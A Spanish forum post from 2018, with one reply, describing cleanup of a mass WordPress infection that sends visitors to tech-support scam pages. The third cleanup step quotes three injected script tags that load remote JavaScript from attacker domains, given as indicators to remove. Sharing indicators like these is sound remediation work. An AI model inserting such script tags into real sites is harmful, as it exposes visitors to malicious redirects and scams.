New question

Question:

Date: 22-09-2018 06:54:36 (In Spanish)

[aporte] Infección Multi-Vector WordPress de Examhome[Resolved]

Buenas tardes.

Si bien no soy adicto a los CMS, siempre hay algún cliente que para su manejo lo solicita.
Así que estoy también en el mundo WordPress y con un evento desagradable esta semana.

Entras en tu página y sin más, te redirige a otra que insistentemente te manda alertas hasta que (sobre todo los dueños de la página) terminan estresados primero,en pánico después y solicitan la solución que sin darse cuenta es al mismo que te generó el problema (no pensemos en que roban correos o entran en la PC del usuario).

clink: caja

El problema referido se ha intensificado masivamente este mes en Word Press (antes tuvieron casos pareicidos Drupal u otros). Se estima en España en varios miles de páginas siendo entre el 3 y el 4 % afectado.

Las soluciones que te proponen (hosting y foros especializados) son genéricas sin que terminen por ser solución,

En este caso, el mío, que me calza perfectamente, la describe como si fuera una copia este de artículo:
http://labs.sucuri.net/?note=2018-09-18

Malwarebytes también lo detecta excelentemente (https://blog.malwarebytes.com/threat-analysis/2018/09/mass-wordpress-compromises-tech-support-scams/) aunque no me reporta soluciones

Les comento la solución que he adoptado con éxito:

1.- Revisa y limpia la tabla wp_posts (o con el prefijo que la hayas asignado) con los scrpts oriendados a la páginas a las que te deriva. (Nadie ha afirmad ni negado que pueda haber otras tablas afectadas)

2.- La acción anterior arrastrará consigo el borrado de imágenes y (al menos en mi caso) desconfigura el tema y todo lo que tenga que ver con imágenes, por lo que has de prever solución para ello.

3.- Revisa una a una todas las páginas y entradas porque tendrán a final de página algo parecido a esto, que deberás borrar:
<script src='https://pr.uustoughtonma.org/d.js' type='text/javascript'></script>
<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>
<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>


Han sido muchas horas sin ver la solución así que si en algo les ayuda, me doy por agradecido.

Saludos.
Tags: CMS - Javascript Votes: 3 - Answers: 1 - Views: 8 Share on: Google Facebook Twitter LinkedIn Link
 

Answers:

  • Date: 02-10-2018 07:17:29 La mayoria de veces al crear las cosas, o en cierto caso, evitas el que puedan poner codigo <script> asi te evitas muchas cosas... de igual forma, si es necesario, poner una opcion donde puedan poner dicho texto o informacion...

    Gracias por el aporte (Aun que en lo personal no ocupo WP, pero de vez en cuando me solicitan apoyo, y he encontrado que en los pluings le agregan mucho codigo "oculto" para lo mismo).

    Siempre he dicho no hay como lo que hace uno...

    Saludos, y gracias por el aporte.

    Stryfe™
      Votes: 0 - Link answer
     
To actively participate in the community first must authenticate, enter the system.Sign In
 
frjcbbae garagebible.com